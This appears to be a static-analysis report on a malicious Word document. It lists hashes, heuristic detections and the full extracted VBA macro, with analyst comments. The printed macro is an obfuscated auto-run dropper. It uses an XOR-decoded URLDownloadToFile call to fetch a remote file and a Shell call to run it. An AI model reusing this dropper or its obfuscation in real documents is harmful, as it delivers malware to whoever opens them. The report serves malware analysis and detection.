Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 c697226ca95a08d0…

MALICIOUS

Office (OOXML) / .DOCX

20.9 KB Created: 2021-07-11 15:30:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2026-06-22
MD5: 9a75ee89143d942fa3df8cece68edbba SHA-1: 075d752ca17b31ae02c7b2f16521d3425b540c93 SHA-256: c697226ca95a08d09026445d354e0855e122675dedada11f2dcc042633e7e6ee
Risk score: 150

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell fi6ql3mh("8" & "" & ")" & "?" & Chr(56) & "" & Chr(98) & ")" & Chr(52) & "" & ")" & "")
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Declare PtrSafe Function URLDownloadToFile Lib fi6ql3mh("9" & "" & chr(62) & "" & " " & "!" & "#" & "" & chr(34) ) Alias _
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/math — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — Referenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — Referenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordml — Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4984 bytes
SHA-256: ce1fde006efa49e2622adbb6b39399ea5b8a070cc88ffafd08102e45eaea1fb8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word executes this procedure when the document is
' opened with macros enabled. It does nothing itself except call docusign.
' NOTE(review): no procedure named docusign exists anywhere in this extracted
' source; the only candidate is sobnf13e, whose header comment reads
' "docusign Macro". Verify against the full word/vbaProject.bin whether the
' call actually resolves (the decoded source may not match what Word runs).
Private Sub Document_Open()
    docusign
End Sub

Attribute VB_Name = "NewMacros"
' Reinterpret a VBA String as its raw Byte array. The String-to-Byte()
' assignment copies the string's internal two-byte characters, so the result
' has twice as many elements as the string has characters (ASCII text gives
' alternating value/0 bytes). Returned as Variant so callers can hold it loosely.
Function gu81(str As String) As Variant
    Dim raw() As Byte
    raw = str
    gu81 = raw
End Function
' Inverse of gu81: rebuild a String from a raw Byte array by direct
' Byte()-to-String assignment (two bytes per resulting character).
Function o39f(bytes() As Byte) As String
    Dim text As String
    text = bytes
    o39f = text
End Function

' String deobfuscator used by every sensitive call in this module: the
' Declare Lib/Alias names, the download URL, the local file path and the
' Shell command are all passed through it at call time.
'
' Algorithm: every non-zero byte of the input (as a raw two-byte-per-char
' array from gu81) is XORed with every byte of the constant key p_. Because
' XOR is associative, that collapses to XOR with a single constant byte —
' the XOR of all key bytes, which for "iexf375o" works out to 0x4C. Zero
' bytes (the high byte of each character for ASCII input) are left at 0,
' so the two-byte layout survives and o39f can turn the result back into a
' String. Callers presumably assemble the input from "..." & chr(n)
' fragments so the encoded value never appears as one literal.
'
' NOTE(review): c and i are never declared (no Option Explicit), so both
' are implicit Variants; harmless here, but worth knowing when re-running
' this routine in a sandbox to recover the plaintext values.
Function fi6ql3mh(str As String) As String
    Const p_ As String = "iexf375o"
    Dim sb_() As Byte, pb_() As Byte
    sb_ = gu81(str)
    pb_ = gu81(p_)
    
    Dim uL As Long
    uL = UBound(sb_)
    
    ' ReDim zero-initialises scb_, so skipped (zero) input bytes stay 0.
    ReDim scb_(0 To uL) As Byte
    
    Dim idx As Long
    
    ' Trailing colons on the For lines are empty statement separators.
    For idx = LBound(sb_) To uL:
        ' Zero bytes pass through untouched (see ReDim note above).
        If Not sb_(idx) = 0 Then
            c = sb_(idx)
            ' XOR with the whole key; net effect is XOR with one constant byte.
            For i = 0 To UBound(pb_):
                c = c Xor pb_(i)
            Next i
            scb_(idx) = c
        End If
    
    Next idx
    
    fi6ql3mh = o39f(scb_)
End Function


' Win32 import whose library name and exported function name are both
' produced by fi6ql3mh, so the real Lib and Alias strings never appear in
' clear in the source; "URLDownloadToFile" is only the VBA-side name.
' NOTE(review): standard VBA accepts only string literals after Lib and
' Alias — a call expression in those positions should not compile in Word.
' Either the sample is non-functional as extracted, or the decoded source
' differs from the compiled p-code that Word would execute; confirm against
' the raw word/vbaProject.bin before trusting this listing as "what ran".
' pCaller and lpfnCB are declared Long rather than LongPtr; the single call
' site in sobnf13e passes 0 for both, so this only affects the signature's
' correctness on 64-bit Office, not the observed behaviour.
Declare PtrSafe Function URLDownloadToFile Lib fi6ql3mh("9" & "" & chr(62) & "" & " " & "!" & "#" & "" & chr(34) ) Alias _
    fi6ql3mh(chr(25) & "" & " " & chr(0) & " " & chr(35) & "" & ";" & "" & """" & " " & "" & "#" & "" & chr(45) & "" & chr(40) & "" & " " & "#" & "" & "
" & "" & chr(37) & "" & chr(32) & "" & ")" & chr(13) ) (ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
Sub sobnf13e()
'
' docusign Macro
'
'
' Download-and-execute stage. URLDownloadToFile fetches a remote resource
' into a local file: the first argument (the multi-line fragment soup below,
' including embedded literal line breaks) is the encoded URL and the second
' is the encoded destination path; both are decoded by fi6ql3mh only at call
' time. Caller and callback arguments are 0. dwn receives the HRESULT but is
' never checked, so the Shell below runs whether or not the download worked.
' Note dwn is undeclared (implicit Variant).
dwn = URLDownloadToFile(0, fi6ql3mh("$" & "" & chr(56) & "8" & chr(60) & "" & "?" & "v" & chr(99) & "c" & "" & chr(63) & chr(121) & chr(60) & "" & chr(42) & "" & chr(39) & "" & "-" & "b" & chr(60) & "$" & "" & chr(98) & chr(42) & chr(37) & " " & chr(41) & "?" & "b" & chr(125) & "" & "(" & "" & ">" & chr(58) & "b" & "" & chr(47) & "" & chr(35) & "!" & "c" & chr(53) & "" & "x" & "!" & "" & " " & "" & " " & chr(28) & "" & "-" & "*" & "" & "a" & "" & "}" & chr(126) & "" & chr(54) & "" & " " & " " & "{" & "" & "~" & "" & chr(126) & "" & "6" & "(" & "6" & chr(14) & "" & "
" & "" & chr(13) & chr(4) & chr(0) & "" & "z" & chr(61) & "" & chr(62) & "" & chr(62) & "" & "9" & chr(28) & "" & " " & " " & "" & "-" & chr(59) & chr(13) & "u" & "" & chr(32) & " " & "" & chr(126) & " " & " " & "" & chr(19) & " " & " " & chr(54) & chr(21) & " " & "" & ":" & "" & chr(43) & "t" & "" & "/" & "" & "=" & "" & ";" & "" & " " & "" & chr(28) & "" & " " & "" & ">" & chr(9) & " " & chr(37) & "" & "?" & "" & " " & chr(22) & "    " & "" & " " & "" & chr(54) & "*" & "*" & "" & " " & "5" & "" & chr(37) & "" & " " & "  " & "" & chr(24) & chr(59) & "" & chr(0) & "x" & "" & ">" & "" & chr(56) & "" & "." & "" & "4" & "" & " " & "" & " " & "" & chr(126) & "" & chr(14) & " " & "" & chr(34) & chr(57) & "" & " " & chr(34) & "" & chr(54) & chr(24) & "" & chr(53) & "" & chr(124) & "" & " " & "" & " " & chr(14) & "" & " " & "" & " " & "" & "'" & "" & chr(6) & "" & "/" & chr(58) & "" & "-" & "" & chr(41) & chr(7) & "!" & " " & "" & "/" & "" & " " & "=" & "" & " " & "" & chr(40) & "!" & "" & "a" & "" & chr(2) & chr(3
4) & " " & chr(42) & "" & chr(46) & "" & chr(125) & chr(120) & "" & "}" & "#" & "" & chr(43) & " " & "" & chr(122) & "{" & chr(26) & "" & chr(45) & "a" & "" & chr(39) & chr(121) & "" & " " & "" & " " & chr(13) & "" & chr(53) & " " & "" & chr(20) & " " & "" & "9" & "" & ":" & "" & " " & "%" & "" & chr(34) & chr(61) & "" & ")" & "" & chr(6) & " " & ";" & "-" & " " & "" & ">" & "" & chr(7) & "" & "
" & "" & chr(45) & " " & chr(20) & " " & "" & chr(21) & "" & chr(7) & "" & " " & "" & "x" & "
" & "" & chr(127) & chr(9) & chr(15) & "" & chr(2) & "x" & "" & chr(19) & "" & "&" & "" & "6" & "" & """" & "'" & "" & " " & "  " & " " & "" & "<" & chr(57) & "" & "x" & chr(58) & "" & chr(2) & "'" & "" & chr(53) & "
" & "" & chr(97) & "" & "#" & "" & chr(40) & chr(123) & "" & chr(31) & "" & chr(123) & " " & "?" & "" & chr(38) & chr(117) & chr(60) & "" & chr(10) & "" & "~" & chr(1) & "" & chr(116) & chr(62) & " " & "" & " " & "" & "\00" & "" & chr(8) & "" & chr(38) & "" & chr(45) & chr(7) & chr(126) & "" & chr(56) & "" & "\00" & chr(42) & chr(4) & "" & " " & " " & chr(13) & chr(40) & "" & " " & "" & chr(0) & "" & chr(1) & "" & chr(97) & "" & chr(1) & "" & " " & chr(40) & " " & "" & " " & "+" & "" & chr(120) & "" & chr(54) & "" & "}" & "" & chr(97) & chr(97) & chr(21) & "" & chr(22) & chr(32) & "4" & "" & " " & chr(115) & "" & "
" & chr(26) & "" & chr(3) & chr(58) & "" & ")" & "" & chr(62) & "" & ">" & chr(37) & chr(40) & "" & chr(41) & "" & chr(113) & "" & chr(125) & "" ),fi6ql3mh("8" & "" & ")" & "?" & chr(56) & "" & chr(98) & ")" & chr(52) & "" & ")" & "" ), 0, 0)
' Launches the file just written: the Shell argument is the same encoded
' fragment as the download destination above (only Chr/chr casing differs),
' so it executes the downloaded payload. The decoded value appears to be a
' bare filename with no directory component — confirm by running fi6ql3mh on
' it in a sandbox; if so, both calls resolve against Word's current directory.
Shell fi6ql3mh("8" & "" & ")" & "?" & Chr(56) & "" & Chr(98) & ")" & Chr(52) & "" & ")" & "")

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 16896 bytes
SHA-256: 8344173b2a2093ca59c1be8f2d2d6d5c100a08372b9b9a06d40d28b9abf31eda